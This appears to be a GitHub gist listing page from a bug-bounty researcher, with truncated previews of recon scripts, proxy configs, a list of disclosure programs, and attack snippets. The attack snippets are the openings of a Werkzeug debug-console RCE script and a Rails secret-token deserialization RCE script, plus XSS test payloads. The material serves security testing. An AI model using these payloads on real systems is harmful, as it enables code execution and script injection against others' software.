View werkzeug_rce.py
import requests | |
import sys | |
import re | |
import urllib,bs4 | |
response = requests.get('%s/console' % (sys.argv[1])) | |
if "Werkzeug powered traceback interpreter" not in response.text: | |
print("[-] Debug is not enabled") | |
sys.exit(-1) |
View s3_bucket_region_checker.py
#!/usr/bin/env python | |
import boto3,sys,time,requests | |
import botocore.exceptions | |
from urllib3.exceptions import InsecureRequestWarning | |
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) | |
import datetime,os | |
os.environ['AWS_DEFAULT_REGION'] = 'us-east-1' | |
s3 = boto3.resource('s3') |
View foxyproxyBB.json
{ | |
"84kr3q1592995213323": { | |
"type": 1, | |
"color": "#cc883a", | |
"title": "Burp", | |
"active": true, | |
"address": "127.0.0.1", | |
"port": 8080, | |
"proxyDNS": false, | |
"username": "", |
View bb-foxyproxy-pattern.json
{ | |
"30523382": { | |
"className": "Proxy", | |
"data": { | |
"bypassFPForPAC": true, | |
"color": "#f57575", | |
"configUrl": "", | |
"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=", | |
"cycle": false, | |
"enabled": true, |
View gist:4defc9a0262c2ab115a996f3496be022
curl -s "http://web.archive.org/cdx/search/cdx?url=*.bugcrowd.com/*&output=text&fl=original&collapse=urlkey" | grep -P "=" | sed "/\b\(jpg\|png\|js\|svg\|css\|gif\|jpeg\|woff\|woff2\)\b/d" > Output.txt ; for i in $(cat Output.txt);do URL="${i}"; LIST=(${URL//[=&]/=FUZZ&}); echo ${LIST} | awk -F'=' -vOFS='=' '{$NF="FUZZ"}1;' >> Passive_Collecting_URLParamter.txt ; done ; rm Output.txt ; sort -u Passive_Collecting_URLParamter.txt > Passive_Collecting_URLParamter_Uniq.txt |
View send_urls_to_burp
#!/usr/bin/python3 | |
import requests,sys | |
import urllib3,queue,threading | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'} | |
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} | |
urls_inp = sys.argv[1] |
View bbprograms.txt
google dork -> site:.co.uk inurl:"responsible disclosure" | |
https://registry.internetnz.nz/about/vulnerability-disclosure-policy/ | |
http://www.123contactform.com/security-acknowledgements.htm | |
https://18f.gsa.gov/vulnerability-disclosure-policy/ | |
https://support.1password.com/security-assessments/ | |
https://www.23andme.com/security-report/ | |
https://www.abnamro.com/en/footer/responsible-disclosure.html | |
https://www.accenture.com/us-en/company-accenture-responsible-disclosure | |
https://www.accredible.com/white_hat/ | |
https://www.acquia.com/how-report-security-issue |
View phantonjs-xss.html
<html> | |
<head></head> | |
<body> | |
<a href="javascript: alert('clicked xss link')" id="link">click me</a> | |
<img src="xx" onerror="alert('xss')" /> | |
</body> | |
</html> |
View rails-secret-token-rce.rb
#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others | |
require 'base64' | |
require 'openssl' | |
require 'optparse' | |
require 'open-uri' | |
SECRET_TOKEN = "SECRET HERE" | |
code = "eval('`COMMAND HERE`')" | |
marshal_payload = Base64.encode64( | |
"\x04\x08" + | |
"o" + |
View test.jpg
nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt> |
NewerOlder